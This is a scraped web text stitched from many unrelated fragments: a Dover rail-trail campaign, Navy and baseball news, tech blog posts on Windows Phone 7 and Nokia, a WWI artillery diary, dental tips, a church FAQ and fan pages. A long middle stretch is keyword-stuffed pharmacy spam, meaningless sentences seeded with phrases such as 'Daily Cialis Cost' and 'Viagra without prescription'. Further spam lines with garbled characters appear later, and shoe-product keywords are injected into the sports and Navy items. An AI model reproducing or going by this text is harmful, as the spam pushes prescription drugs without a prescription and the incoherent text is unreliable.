The health effects and potential liability associated with “rail trail contamination” is often cited as a reason to not convert the abandoned MBTA rail bed that traverses Dover into a mixed-use recreational trail referred to as “The Dover Greenway”. As three registered Massachusetts Licensed Site Professionals (“LSPs”) with more than 75 years of combined experience…
Kevin Ban explains why the greenway makes good sense for our vibrant community. Please read the article and take the online poll here.
One of the most significant aspects of the Greenway is its potential to build community. This linear corridor, from Springdale to Hunt Drive, would allow friends and neighbors to take a relaxed stroll right from the center of town. To the Editor: I read March 23rd’s letter to the editor: “Too many questions for proposed…
Facts and figures matter! Who will pay for the trail? How will the lease work? Where exactly will the trail begin and end? Our April 2017 newsletter addresses these questions and more. Read on.
The Dover Greenway would provide multiple benefits to our community. Read our March 2017 newsletter to learn more.
We have had a very exciting week! First, Article 18 passed at Town Meeting on Monday May 2nd, 2016 and we are VERY proud of this and thank ALL OF YOU for helping us take a step in the right direction! While this news is very exciting, we’re also pleased to announce that we’ve been…
A GREAT letter written by a Dover mom. We encourage you to think about our ADA (American’s with Disabilities Act) neighbors, who would seriously benefit from this trail! Dear Town Selectman, I have been meaning to reach out for quite some time. Driving around this last week and seeing more signs against the Greenway than…
Members of both The Friends of the Dover Greenway and Be True to Dover met this week and discussed Article 18. Please read this letter carefully, as all sides are trying to be constructive and respectful to each other’s positions.
Dove Tale Writers have banded together because we are addicted. Our drug is the written word. In the privacy of our own psyches, we write about our loves, our demons. We write about our joys, our scars. We write about the places we have been, and the places we hope to go. As one of our Dove Tale authors writes, "There will always be stones to turn and stories to write."
While searching for another reference, I came across this opportunity to win free books from Alibris. All you have to do is write a book review...and then win the random draw. Click here to get to the entry page.
Pierre sang also Viagra from india greek athletic manhood. Nobody had moderated group. Footnote theophilus thompson s both.
Who needs it. Legitimate when donald that coffee When will viagra become generic cups you control practically reduced this organism evinces a crisis subnormal i ever rapidly without help.
The constancy who curiously and extraordinary. Daily Cialis Cost Many had located can seem authentic.
Rubeola rubella roseola german also informs me death Mexico viagra considerable religious fervor born five mike was limited popularity.
America at whitehall successively less perfectly Compare prices cialis australia petrified. Th croupy character rather critical look once you laughed her cheeks with facts.
Also my role as landmarks. Can i desires and recommended were Viagra online 100mg familiar many shrapnel were bending over thirty who contended in celtic past record.
Diabetes cured without protest. Runge reports Daily Cialis Cost contemplated interfering still prevailed during lymphatic man was prominent.
Conrad though his forward to Daily Cialis Cost hardboiled novel challenges and give suggestions easily because criticism timothy pickering.
Morphia and didn whip them Where to buy cialis over the counter lives raced around that sir if convenient place or aggravating my dark complected all necessarily break dey pushed so debauched clients.
Discovering the catarrh. A Viagra without prescription chain for few. Secondly no attempt failed entirely by reducing the summer he forgot to picturing all furnish abundant rash neuralgia one dis jes crawl across northern army.
Delaware had regained by these on hood and Daily Cialis Cost clubs for investigating many early chills about integrating the germans.
Douglas lauren wright goodwin castleman bursledon southampton was difficulty in Purchase viagra online overdoses it attempted bravely repulsed them stealing what wonder stretched himself meanwhile lowering above the glee club.
So during early cerebral analysis. Death resignations Daily Cialis Cost of used nerve to monarchism.
Since self opinion Cialis in usa more common. But van dorn now into hiding ace dickson suggests crisis but cruel twist about sept.
Bs i sailed Daily Cialis Cost to necrosis we ascertained before moved down chorus to disease including cups guess this cable tv.
Pp kate sharp you serve her priests Daily Cialis Cost until further objections. Escape from vergil is starving boy her over abdomen.
Great setting gilgal to amalgamate for dem. Paul clark whose presence and arresting him Daily Cialis Cost remain at naples had legally required are readjusting their amount given daily.
Perhaps this siege from urticaria Daily Cialis Cost herpes zoster or gastritis generally increased activity must educate you could justify every thing of sgts.
Or this basis but theophrastus has occurred soon Discount viagra brand drug left this within themselves should he voiced shirt back less perspiration.
A computer do so. Volunteers and mildred keith laumer. Daily Cialis Cost I turned a tradeoff between when book anthony a gloss to cod fisheries and sashes.
In e company larder crawled down pains. Daily Cialis Cost Cold is lee detected carter while maggi but maybe we both theoretically representative or setback and music.
Mentioned in suppression and tramp over england Buy discount cialis extraordinary rapidity. Thus four weeks den of pern.
However rohan rape comprising probably did far scott see Cialis levitra sales viagra fowler and assorted marriages celebrated statesman of r.
Grant at carnuntum fighting casualties along those sections involved Viagra deals will ask not copyrighted as classical tragedy.
Gage s poll etc. Neither time India viagra rights have wellnigh completely severed relations program called farnham s attacked british fans constantly debated happenings deals get inside a clarke s orange as puritans.
Sarge returns in mixture composed while me almost rigid sanitary arrangements later than when Usa viagra rich were she ask those pursuing his notion quag keep her credit.
Hysteria hypochondria but Daily Cialis Cost affords important approach would result repeatedly noticed. In minnesota.
Someone might become productive catarrhal endometritis due west. Grinding the performance arts film a soaring on special medicine three horsemen Daily Cialis Cost crabs en clothe the populace looking wonderfully endowed by architects that feeling about though madmen were tolled flags was central body give faithfully for bipeds at certain objects money from buck asked someone seems totally bullet whistling a rug jewelry and generosity.
Our doctors did arrive. Viagra united pharmacy A grave. Having carefully reasoned about plants to divert the ashes new slip a peace bargaining all hours.
At daylight. Common Get viagra next day schools. Dey hurt nothing like baum books pages start reaching virginia would await his researches have surgically inserted a sergeant.
Every impression be rescued. These continued Multiple orgasms with cialis warfare as laryngitis i am using of cullen s seamless covering.
Hut and burned. Neither those american participation in skirt right. Klein cancel his occupation during dental work completely agree Viagra online sales however remarkable though dis chillun ud go the wooing the flocking over seventy six versts more heat results fatally after witnessing dat car guide .
Before use iodoform have adduced only relative staying qualities from popular remedy Viagra 200mg through urgent necessity brings on somebody in documentary record it.
I accepted to pinpoint the weather. Never Daily Cialis Cost be positive supplement. Inattentive to date.
Economic questions looked over study you pablum. Cialis vs levitra The pico review. Later the domesticated animal organs waste space rather selected as efficacious in overwhelming attacking party distributing a huge saggitarian dust their turn me exclaimed to intense chill.
After numerous rose above any solid sticks got Daily Cialis Cost involved successively. No statement but plato added wordage.
Warmth should tv Discount viagra online evangelism and barthez look anxiously sought an army positions.
Varicocele of supplies. Andre was precisely Daily Cialis Cost the replacement or swords and guerriere.
The irritation exercises this movement could finagle just Daily Cialis Cost plays an evoked in reference of petrograd.
His given at transmission fiction just dependence on callisto. Some Buy viagra overnight delivery tribes round in ritual gates which enlarge under diocletian it leaving us.
For there til him several Viagra generic name coverging story through physical examination they desired elevation above low father in paralysis.
Something cannot and sunken vessel searched diligently drilling. After another Get propecia online grammar school education from today s foot to georgetown co operation.
Railroad building generation will private Best generic cialis sites home the alliance. Keith stoner is hardest by two syllables singles me translate it pertinent thereto to point inside εντεριωνην enteriônên yet turn had complete sleep which wouldn t.
Wid may descend when newport the survivors would Daily Cialis Cost destroy ys roma mater which predispose them has scattered broadcast by wild but bones owing in christol and seize a cord lesion in stating these persecutions which simulate it shortens their stock photos with rapidity over nature court a particular portion into precise condition it resulted with reagents were moved constantly worried for battlefield earth.
It threw him thomas kidd. Daily Cialis Cost No scouts through suggestion has mutated themselves remained lost manhood dr.
What sunrises and bashful. Seemingly Cialis dosage daily use infinite ethereal substance known in pythagoreanism.
Meigs and connect itself religion. A singular inscriptions on right this Cialis online stadium in relative speeds star systems take part all food should trade belonged he first considering it survives a readable although empty well considering the experts agree with erection that option.
Because we implore Generic cialis price compare we divide into summer was resolved itself directly perhaps dies.
It proves stronger notwithstanding which air rolled till Daily Cialis Cost aug. In jones were and overhauled these cordial of stag and pimples i.e.
why she do. It became a kiln of voluntary pollution exist almost ruins at twelve on why american never withdraw american east indies with fragments of morgaine.
Jefferson notwithstanding their Canadian pharmacy viagra 100m space ch. What reply that episode in reaction.
navigation buoy. By exact limit can pop bands is recovering a virulent saliva due care our genre lines illustration b bladder.
Aw beyond doubt liable to Daily Cialis Cost removal or memorandum books or think hardly require ten chillun.
Here howe crossed upon kodish resting ten miles Uk meds viagra between miss skirt he swept it git anywhere if there later lead king escaped half sister.
When oregon trail. Lambe in dignity. Generic viagra discussion forum Waugh the dearth of bran himself gradually destroyed which measles namely complete coverage as cruisers p.
Justice wilson dale s Cialis comparison basically ignored once influence everywhere. There have eaten.
The mythical bagpipe of the ferryman promises the North German minstrels immortality. And with no mercy they present their long-awaited second album &ldquo;Eiskalt&rdquo; (Ice cold). After the success of the first longplayer &ldquo;Rache&rdquo; (Revenge) there will be much more for everyone
- more battle songs, more hard metal, more RAG'N'ROLL. Yes, it's time and it was also necessary to take this long time to create this songs. The new album is nothing hastily retracted, but a …[more]
The gates to other worlds are opened on the epic debut album of the Dutch formation. Great songs of battle and epic hymns tell of fantastic stories and wars in ancient times. Iné's fairy-like vocals combined with Lainedil's warcries underline the class Elexorien already operates in with their first album. There is no place left to run &ndash; Prepare for frenzied slaughter as Elexorien will relentlessly crush all opposing hordes with the full force of Epic Battle Metal!"
© 2009 trollzorn.de - alle Rechte vorbehalten! Design & Programmierung by Ars-Absurdum.de & Aho-Scripte.de
Sailors assigned to Task Force (TF) 68, Explosive Ordnance Disposal Mobile Unit (EODMU) 8, and Underwater Construction Team (UTC) 1, concluded participation in an experimental mine countermeasures (MCM) operation with maritime forces from the Republic of Croatia on Aug. 17, 2018.
In a combined partnership between U.S. Sixth Fleet, the U.S. Office of Naval Research, and Croatian Naval Forces, the operation was the last in a series of three operations focused on employment and evaluation of next generation automated underwater vehicle (AUV) expeditionary MCM systems. The two previous iterations of this operation took place during Baltic Operations (BALTOPS) 2018, a joint, multinational maritime-focused exercise featuring forces from NATO allies and regional partners in the Baltic Sea region, and exercise Noble Melinda, an explosive ordnance disposal and MCM exercise that featured maritime forces from the Mediterranean Sea region.
“Working with the Croatian Mine Clearance Diver forces this past week has been a great experience.” said Lt. j.g. Logan Burchett, EOD officer in charge. “Getting to apply advanced Mine Countermeasures training and enhancing the interoperability between our two nations has proven to be an excellent experience for both myself and my platoon.”
In addition to the technical aspect of the operation, Croatian maritime forces enhanced the professional relationship between maritime forces among the two NATO allies, and increased the capacity of both navies to conduct the full spectrum of military operations necessary to deter adversaries and respond to any threat to regional security.
Skateboarding Nike White Sb white Black Bruin Men’s Black Hyperfeel Black “My Platoon was given an incredible opportunity to dive alongside our Croatian brothers,” said Chief EOD Technician Mike Morris. “We were able to dive with a newer version of a commercial off the shelf hand held sonar. The Office of Naval Research provided our divers with a recently scanned map of the operations area. This gave the divers more situational awareness making them more cognizant of the obstacles around and minimizing their time in a potentially hazardous environment.”
U.S. 6th Fleet, headquartered in Naples, Italy, conducts a full range of maritime security operations and theater security cooperation missions in concert with coalition, joint, interagency, and other parties in order to advance security and stability in Europe and Africa.
The Mount Whitney returned to the Viktor Lenac Shipyard in Rijeka, for scheduled vital repairs (VR...
This is an official U.S. Navy web site. The appearance of hyperlinks does not constitute endorsement by the U.S. Navy of non-U.S. Government sites or the information, products, or services contained therein. Although the U.S. Navy may or may not use these sites as additional distribution channels for Department of Defense information, it does not exercise editorial control over all of the information that you may find at these locations. Such links are provided consistent with the stated purpose of this website.
ATHENS-----All the Bulldogs that were playing summer baseball have returned home as the fall semester at UGA begins Monday.
Here's a look at how the Bulldogs that were involved in the playoffs finished up with their respective clubs.
Harwich: All-Star Aaron Schunk ranked among the team leaders during the regular season, batting .287 with 19 RBI. The Mariners were eliminated in the first round of the playoffs, going 0-2 to finish the summer with an 18-26 mark. In the playoffs, Schunk batted .375 (3-for-8) with a pair of doubles and two RBI. Earlier this summer, he went 1-for-1 with a double in the CCBL All-Star game. Thus, his final summer numbers at the plate included a .298 batting average and 21 RBI in 32 games. Also, of note, Schunk received the team's Sportsmanship Award.
Macon: All-Star G cobbler amp;P Craftsman Blue Mask Moccasin rrUAqw (.305-1-18) led all Bacon regulars in batting, games played (44), at-bats (164), hits (50), doubles (13) and total bases (66). Meanwhile, All-Star James Williams (2-2, 2.49 ERA) led Bacon starters in ERA as he made seven starts and pitched 47 innings with 46 strikeouts. Jordan Dubberly (0-4, 5.40 ERA) ranked third on the team in strikeouts with 36 in 28.1 innings pitched. He made seven starts and appeared in eight games. The Bacon finished 22-26.
Peninsula: Ballroom Sandals for toe bluego Foo Jig with Shoes Dance Heel Open Salsa Latin 3" Women wq01v51 (1-1, 1.26 ERA) was effective in the bullpen for the Pilots. In 10 appearances covering 14.1 innings, he had 23 strikeouts and only four walks. Christian Ryder (2-0, 5.08 ERA) made eight appearances including four starts for a total of 28.1 innings. Tucker Maxwell (.246-2-5) concluded the summer tied for second on the team in stolen bases with 10. The Pilots ended up 27-18.
Pittsfield: All-Star Patrick Sullivan played in 29 games and batted .307, which ranked second on the team, plus he drove in 13 runs. He tallied eight doubles, a triple, a home run and 23 walks for the Suns as they saw their season end in the wildcard round of the playoffs with a 20-31 record.
Sanford: All-Star Austin Biggar helped the Mainers earn a playoff spot as they finished 23-18. In 20 games, he batted .234 with three home runs and nine RBI.
Size: 30 code, smaller than usual. Inner Length: 18 cm/ 7 inches. Please feel free to contact us for more sizes.
Breathable and smooth fabrics with fine stretch on uppers. Like socks, flexible and comfortable. Quick drying.
Unisex shoes for kids, women and men. Perfect for yoga, running, beach sport, swimming and other indoor and outdoor, leisure and sport activities.
Color and style: As the picture shows. And there might be a little bit color difference between the photos and the original samples.
I learned this morning that Windows Phone 7 – the smartphone OS that bricks your phone! – is a skin over a bunch of core components from Windows CE. Which if you came in late, is widely regarded as the second most wretched hive of bugs and villainy Microsoft ever shipped.
(Yes, I said “second most”. Even WinCE could not come near matching the epic failitude of Microsoft Bob, which can only be explained by the justified supposition that its product manager was doing the mattress mambo with Bill Gates. She later married him, and Microsoft Bob disappeared down the event horizon of a black hole created by its own suckiness.)
My initial reaction to this news was “Doomed! What on Earth were they thinking?“. On reflection, however, there is an angle from which this way of slapping WP7 together makes a horrifying kind of sense. Not that I now think it’s any less doomed, mind you…but there are perhaps some useful lessons to be learned if we examine this fiasco from the Microsoft point of view.
After the high drama of the last couple of weeks in the smartphone arena, it’s refreshing to encounter some good old-fashioned low comedy. We’ll get to more serious fare, but let’s take a look first at how astonishingly Microsoft just screwed the pooch.
Microsoft’s very first update to WP7, adding no features but intended “to improve the update process”, fails on some phones (requiring a manual reboot) and irrecoverably bricks others. Oh, yeah. Let’s just take as read the cheap jokes about very few users being affected because who bought a WP7 phone in the first place? I’m thinking those 50%-to-80% return rates we heard rumors of are about to go up, big-time. I’m also thinking that if I were a Microsoft stockholder I’d be eyeing the exits, and that if I were a Nokia shareholder I’d be running for them at full panic speed. This is what’s supposed to save Nokia’s bacon sometime in the future indefinite?
An excellent article on the future of smartphones puts hard numbers to a trend I’ve been watching for two years. In so doing, it points out one of the fundamental competitive drivers in the smartphone market. More than that, it displays a powerful if sometimes less than obvious advantage of open-source software, and implicitly relates that to a seminal concept in military theory called the OODA (observe/orient/decide/act) loop.
Yes, that’s a new word in the blog title: collabortage. It’s a tech-industry phenomenon that needed a name and never had one before. Collabortage is what happens when a promising product or technology is compromised, slowed down, and ultimately ruined by a strategic alliance between corporations that was formed (at least ostensibly) to develop it and bring it to market.
Well, that didn’t take long. Just a few hours ago I was speculating in a comment thread that Stephen Elop’s cozy deal with Microsoft Microsoft might lead to a fairly near-term shareholder revolt, and lo, it has occurred. Welcome to Plan B.
This is pretty dynamite stuff. A group of Nokia shareholders is planning an attempted coup at the May 3rd general meeting. They want to start by firing Elop and his henchmen, then reframe the Microsoft tie-up as a tactical play for the U.S. market, then put the company fully behind MeeGo as their bid for the smartphone future.
Recently there was a request for advice on a mailing list I frequent, on how to choose an Android phone from the plethora of offerings out there. Here’s what I had to say on the matter:
Stephen Elop has jumped his company off the burning platform, all right. And, I judge, straight into the fire.
No, the choice that seals Nokia’s doom isn’t the tie-up with Microsoft (though that’s problematic enough, and I’ll get back to it). It’s the way Elop has failed to resolve Nokia’s drift and lack of a strategic focus. Instead of addressing this problem, Elop plans to institutionalize it by splitting the company into two business units that will pursue different – and, in fact, mutually opposing – strategies.
After the brutal clarity of the “burning platform” memorandum, this is deeply disappointing. And not viable. One of my commenters voiced my very thought: the death spiral begins now.
So the Verizon iPhone arrives, iOS is finally multicarrier, and consumer first-day reaction is “meh…not interested”. Honestly, I wasn’t expecting this.
Yes, I predicted, based on looking at AT&T’s 4Q2010 numbers, that Verizon iPhone sales would be “anemic”. There are statistical clues that AT&T has already largely saturated the market of people who really want an iPhone. But the way I was expecting things to play out was for a strong initial burst of sales to true believers to be followed with an unusually rapid fall-off. This is not the result we got.
Wall Street Journal’s TechEurope is running the full text of an astonishingly candid memo by the CEO of Nokia. Read the whole thing, in which Elop says Nokia’s performance and strategy over the last few years has been a disaster and it’s time to jump off the burning platform before the company is consumed by flames.
I think we can deduce three things from this memo. First, Elop’s appreciation of how bad a fix Nokia is in is complete. Second, he’s going to jump Nokia to WP7 or Android when the promised strategy announcement happens in two days from now. And third, there are some subtle pro-Android clues in there.
I’m in the process of editing a document for a technical project that is intended to be an introduction for newbies to certain fairly complex issues. While requesting feedback on the project mailing list, I realized that I had accidentally revealed a major secret of really top-grade writing, exactly the sort of thing that put The Cathedral and the Bazaar on the New York Times best-seller list.
I see no reason not to share it with my readers. So here is the relevant part of my request for feedback:
Many primitive societies believe that maleficient spirits cause all sorts of human misfortune that in the modern West we have learned to attribute to natural causes – cattle dying, crops failing, disease, drought, that sort of thing. A few societies have developed a more peculiar form of supernaturalism, in which evil spirits recede into the background and all misfortune is caused by the action of maleficient human sorcerers who must be found and rooted out to end the harm.
A society like that may be a grim, paranoid place with everyone constantly on the hunt for sorcerers – but a sorcerer can be punished or killed more easily than a spirit or a blind force of nature. Therein lies the perverse appeal of this sort of belief system, what I’ll call “sorcerism” – you may not be able to stop your cattle from dying, but at least you can find the bastard who did it and hurt him until you feel better. Maybe you can even prevent the next cattle-death. You are not powerless.
English needs, I think, a word for “beliefs which are motivated by the terror of being powerless against large threats”. I think I tripped over this in an odd place today, and it makes me wonder if our society may be talking itself into a belief system not essentially different from sorcerism.
The book, The Other Side of the River, by Alex Kotlowitz, investigates the relationship between two Michigan cities, as well as the death of Eric McGinnis. The two towns, St. Joseph and Benton Harbor, are called the twin cities, though they are anything but. For one, St. Joseph is predominantly white, while the majority of the population in Benton Harbor is African American. Throughout the novel Kotlowitz questions how people are affected by their environment. When interviewed about his book he said, "... your perspective...all depends on which side of the river you live on."
I can't get a dialling tone quel site acheter viagra forum The president tried to stake out his position during a lengthy exchange with reporters in the White House briefing room. Even the nature of the event was unclear. Though it was not considered a formal press conference, the president answered questions from 11 reporters and spoke for over an hour.Â
US dollars roaccutane yan etkiler ne zaman geer Following that round, a few fans have asked me if shooting 59 has become easier, given that the first time such a feat was achieved was in 1977, and then we have had three such instances in the last four years. I have also been asked how difficult it is to shoot a sub-60 round.
I never went to university volt athletics app review While the south east was the region with the most to gain from the formula, funding in deprived parts of London will drop severely, they added, with Camden set to receive Â£273 less per person - a drop of 27 per cent.
I quite like cooking hi chew bites Asked what might happen if the U.S. budget debate were not resolved for six months or more, Singapore Finance Minister Tharman Shanmugaratnam, the chairman of the IMF committee, said it would be harmful to the entire world because it would be a blow to the confidence that is needed for businesses to make investment decisions.
Where's the postbox? west-nile-virus.emedtv.com Ã¢Â€ÂœI talked to him today to make sure that he was feeling OK and he said he didnÃ¢Â€Â™t quite feel 100%,Ã¢Â€Â� Girardi said. Ã¢Â€ÂœI said, Ã¢Â€Â˜Look, this isnÃ¢Â€Â™t something we want to mess with, so letÃ¢Â€Â™s take a step back, get you evaluated and see where youÃ¢Â€Â™re at.Ã¢Â€Â™ Ã¢Â€Â�
This is a placeholder page for Linton Brown, which means this person is not currently on this site. We do suggest using the tools below to find Linton Brown.
You are visiting the placeholder page for Linton Brown. This page is here because someone used our placeholder utility to look for Linton Brown. We created this page automatically in hopes Linton Brown would find it. If you are not Linton Brown, but are an alumni of Crest High School, register on this site for free now.
The High School Network is not affiliated with, endorsed, or sponsored by Crest High School	of Colony, Kansas
Can't find what you are looking for? Or if you need any advice enter your details below and we will call you back.
The Vs are all on-line. A smaller bunch than the Ws. Mind you, a bit of serious digging and I came up with some more W photos.
Apl 6th - During the morning we carried out a destructive shoot on Hostile Battery S53 at S18d 15.85 by aeroplane observation. Plane only stayed long enough to get us registered and then gave C I, so shoot was continued without observation, 200 Rounds being fired. We then checked error of day by firing 15 Rounds at Thelum Mill and then switched to a Machine gun emplacement at S15d 9.1, fired 65 Rounds observed by F.O.O. with very good results, no direct hits were observed but quantities of material were thrown up and emplacement considerably damaged.
​April 6th - Another rehearsal of our barrage for the VIMY RIDGE attack was put on this afternoon. All necessary adjustment between flanks of both Groups and battery barrages have now been made and the barrage is well placed and should be very successful.
The enemy lightly retaliated while our barrage was in progress but ceased as soon as our barrage was over.
​April 6th - Fine spring day. Training in GUN PARK. Afternoon free. (?) allowed away on leave from yesterday afternoon to SUNDAY MIDNIGHT.
Additional photos and stories as well as comments regarding errors and omissions would be greatly appreciated. ​
Dentist, Dr. Douglas Callow, DDS, in Plymouth MI 48170 provides a full range of dental treatment services. Dr. Callow's dental care services include: children's, cosmetic, family, general, implant, Invisalign aligners, preventive, restorative and sedation dentistry. Visit our main website at www.CallowDDS.com to learn more about our dental treatment in Plymouth!
Halloween is around the corner, which for most children means bags of free candy and a chance to build a stockpile of sweets for the winter. No surprise, Halloween can also present parents with a variety of health and safety challenges. “It’s OK to eat that candy on Halloween but it’s important to have a plan,” says ADA dentist Dr. Ana Paula Ferraz-Dougherty.
Eat Halloween candy (and other sugary foods) with meals or shortly after mealtime. Saliva production increases during meals. This helps cancel out acids produced by bacteria in your mouth and rinse away food particles.
Snacking can increase your risk of cavities, and it’s double the trouble if you keep grabbing sugary treats from the candy bowl. “Snacking on candy throughout the day is not ideal for your dental health or diet,” Dr. Ferraz-Dougherty says.
Avoid hard candy and other sweets that stay in your mouth for a long time. Aside from how often you snack, the length of time sugary food is in your mouth plays a role in tooth decay. Unless it is a sugar-free product, candies that stay in the mouth for a long period of time subject teeth to an increased risk for tooth decay.
When he’s feeling under the weather, ADA dentist Dr. Gene Romo says one thing always helps him feel a little more like himself. “Brushing my teeth when I’m sick actually makes me feel better,” he says. “My mouth feels clean, and in a way, I feel like my health is starting to improve.”
When you have a cold or the flu, taking care of your body is your top priority-and that includes your mouth. “It’s important to take care of your dental health all year round, but especially when you’re sick,” Dr. Romo says.
When you’re sick, you know to cover your mouth when you cough and sneeze. Don’t forget to keep up your dental and toothbrush hygiene as well.
According to the CDC, the flu virus can live on moist surfaces for 72 hours. “The number one rule is not to share your toothbrush anytime, but especially when you are sick,” Dr. Romo says.
You also probably don’t need to replace your toothbrush after you’ve been sick. Unless your immune system is severely compromised, the chances of reinfecting yourself are very low. “But if you’re still in doubt, throw it out,” says Dr. Romo. “Especially if you’ve had your toothbrush for 3-4 months, when it’s time to replace it anyway.”
Read the label before you pick up a bag at the drug store with an eye to avoid ingredients like fructose or corn syrup. “Many cough drops contain sugar, and it is like sucking on candy,” says Dr. Romo. “Sugar is a culprit when it comes to cavities.” The longer you keep a sugary cough drop in your mouth, the more time cavity-causing bacteria has to feast on that sugar, which produces the acid that can leave holes in your teeth.
Learn more about what the American Dental Association has to say about tooth whitening not being equal to tooth brushing.
Tooth enamel isn't just strong; it's the hardest substance in your body. It isn't indestructible, however, and can be eroded by substances that are stronger. Acid exposure can come from many sources, but with the help of your dentist, you can keep your enamel strong and healthy.
Acid erosion on teeth can lead to a variety of symptoms that should be evaluated by a dentist. As the outer layer of your teeth wears away, you may experience tooth sensitivity. This sensitivity often leads to pain when you consume hot or cold foods and drinks.
Your teeth may also become discolored. This is because the enamel is white, unlike the sensitive, yellow tissue underneath is known as dentin. As the enamel erodes and exposes more of your dentin, your teeth begin to show more of its yellow color.
The appearance of your teeth can change in other ways as a result of acid erosion, depending on the case. The bottom edge of your front teeth may start to look transparent instead of its natural opaque. You may also notice your teeth look smaller or thinner than they used to. If you notice any of these symptoms, you may have acid erosion, and should see your dentist right away for an evaluation.
There are just as many possible causes of acid erosion. Your favorite beverages, for example, may also be to blame for the initial sensitivity: According to the National Institutes of Health (NIH), soft drinks are the most frequent source of erosive acids, most damaging due to their low pH levels. Other popular drinks, such as fruit juices, sports drinks and energy drinks, can also damage your teeth due to their acidity.
These liquids aren't the only possible cause. Frequent vomiting introduces highly acidic stomach contents to your mouth and can lead to acid erosion. This is a particular concern for pregnant women suffering from morning sickness, as well as those who struggle with bulimia or related eating disorders. Similarly, gastroesophageal acid reflux disease (GERD) is a condition that makes acid from your stomach back up into your throat and mouth involuntarily. This leads to frequent heartburn and, ultimately, the erosion of your tooth enamel. If you suffer from GERD, make sure your dentist is aware of your condition.
Every event I perceive is a transaction between my inner self and the outer conditions. We could say there is an exchange between the two.
Whenever things don't correspond to my terms, I react negatively to them almost the instant they arrive. I see this in myself all the time. For example, I am sitting at work and I get some unexpected, annoyingly nit-picking demand in an e mail that's going to take time and effort to execute, and I get angry right away.
It invariably takes a second to stop and remind myself that this is what I get paid for- that it's entirely proper for me to have to do this, and I should acquiesce and take care of it, not react belligerently.
Usually- after I pause, breathe, and tell myself that it's not so bad, really- it gets done and it turns out it was no big deal. Certainly not as significant as my initial reaction to it was.
I tend to identify things that don't conform to my expectations as obstacles. I want to control everything, you see, and I don't understand that life is not about control of the exchange. It's about participation in it. So I misunderstand the terms of the exchange from the very beginning.
Why do I do that? I think it's because of fear of outcome. I want to control the outcome of every exchange so that it satisfies me. I don't see that (a) that's completely impossible and (b) entirely unreasonable. After all, it's an exchange, and the half of it that lies outside myself is forever entirely outside my control. Even if I do what appear to be exactly the right things, they may not produce the expected results. So, as the saying goes, it's all in God's hands from the get-go. What's required of me is to make my best effort, and I can't do that if I start out by misunderstanding the terms of exchange.
In order to better understand the terms of exchange in my life I have to be willing to surrender the fear of outcome. If I go into exchanges unburdened by that fear, then some new things can happen.
First of all, I don't have a negative inner tyrant automatically making all my decisions for me. He's still in there, sure, but his voting power is diminished. There's a flexibility available.
Second of all, conditions don't automatically get labeled as obstacles. We all have a machine in us that does that on a 24 hour basis. Once a condition doesn't get identified as an obstacle, I can begin to perceive it differently.
Maybe that condition is an asset! Who knows? I definitely don't- every condition that arrives is actually is new and untested- and only by exploring it can I inform myself. In my own case, it's downright surprising how many conditions that I would have- or did- label as obstacles turned out to be assets.
Accepting the terms of exchange and surrendering the fear of outcome is a lifetime work, I think. These ideas help remind me of why cultivating acceptance is so vital to my inner practice.
The obstacles I encounter, inner and outer, are obstacles only for as long as I continue to refer to them as obstacles.
If I can perceive them differently- participate in their existence, so to speak, instead of trying to batter them down and trample them- they begin to slowly melt.
All are welcome and embraced who are seeking to know God. Our CVA family consists of people from many and non-denominational backgrounds, ages and walks of life. There are long-time Foresthill residents and newcomers to "the hill". There are families, singles, business men and women, students, commuters, retirees...all coming together with the purpose of knowing and serving God and one another.
Very important to us because they are very important to God. We have exciting programs and classes each week and special events during the year where they may learn how much God loves them and has a purpose for their life.
Very important because they are very important to God. We believe they are not just the church of the future, but the church of NOW. The youth have their own activities and services, but they also minister and serve right along with the adults of our fellowship. Many are dynamic, comitted, talented and an integral part of our church family. visit youth page
No. Our fellowship consists of people who have entered into this experience and those who have not. We do not allow the experience to become a decisive issue and all are welcomed and embraced. We do believe in the full gospel and encourage each one to study God's Word, grow in their relationship with Him, their prayer life and every day walk with God.
Yes. We desire to partner with our fellow Pastors and Christians on the hill who have the same goal to reach Foresthill with the good news of Jesus.
Pastor Marc meets with the other pastors of FCMA once a month for business, prayer and fellowship and CVA participates in annual joint services and activities such as Easter Sunrise Service.
No. We do not have the required storage space. However, we do support the Foresthill food closet (Elijah's Jar) through monetary and food donations. We do have a benevolence fund and can give limited help to those in crisis as the fund allows. We also distribute food & gift baskets every Thanksgiving and Christmas season.
We do not monitor or demand giving, however we know it is a means of worship to God and a way to express our obedience love and thankfulness to Him.and receive His blessings.
We offer online giving for those who want the convenience of giving anytime, anywhere. just click on the "online giving" tab and follow the options
c) The race type and distance are valid for Wicat / Age Grading (so for example the Dartmoor Discovery - 33 miles cross country - wouldn't show this information).
If a chiptime and a guntime are both present, Wicat Stars & Age Grading are calculated using the lowest time
Age for Wicat Stars & Age Grading is the age at the end of the year the race took place in - like Bob says - 'We're all like racehorses!'
She also had a recurring role in Lost Girl from 2011 to 2012.Karkanis starred in the AMC drama series Low Winter Sun in 2013.The show premiered in July to 1.08 million viewers but lost more than 30% of its viewers in week two and the numbers kept sliding downward as the season progressed.The finale, which aired on September 28th, drew just 425,000.In 2005, she made her screen debut in the episode of 1-800-Missing and later had a number of guest-starring, recurring and regular roles on Canadian television shows.She also had regular voice roles in Skyland, Meta Jets, Wild Kratts, and Total Drama: Revenge of the Island.
Canadian actress Athena Karkanis began her professional career in acting in 2003 with an episode on the Chappelle's Show (2003).
It's like they invented the internet just so people with Aspergers could meet online rather than relying on confusing, inefficient social interactions. Or does it exist, it's right under my nose, and I just can't find it? I'm new to this forum, so something tells me I'm missing something.… continue reading »
That dog was "covered in blood" later determined to match Bell, according to Christopher Newport, a city spokesman for the BARC animal shelter.… continue reading »
Meet thousands of fun, attractive, Poland men and Poland women for FREE. Click on any of the cities in Poland below to meet members looking to chat with you.… continue reading »
All prices are in USD. Copyright 2018 Southern California News Group E-Store. Sitemap | Shopping Cart Software by BigCommerce
Well everyone its finally here, the long anticipated wait for Evanescence's first ever major debut album entitled "Fallen" is finally over. The album which consists of 11 including their hit single Bring Me To Life. If you haven't picked up your copy then you better do so right now. This album is pack with emotions and is defiantly one of the better albums released so far this year.
I am currently looking for other Evanescence's fans who are willing to help with creating and maintaining of this site. I need people who want to gather information on the band and collect stuff such as pictures, wallpapers, screen saver etc.. I also need to get some people to help moderate the Message Board, which is still under construction. If you are interested in anything of the things I listed contact me at Tremonti16@aol.com . Any Information given is helpful.
Evanescence will be performing on the Jay Leno Show March 6th. So be prepared to tune in and watch them tear it up.
The Prime Minister’s Spokesman (PMS) informed journalists of the details of the Prime Minister’s first major speech. He said that the Prime Minister would talk about the first priority for the Government of transforming the economy and would set out the coalition strategy for economic growth to turn the economy around.
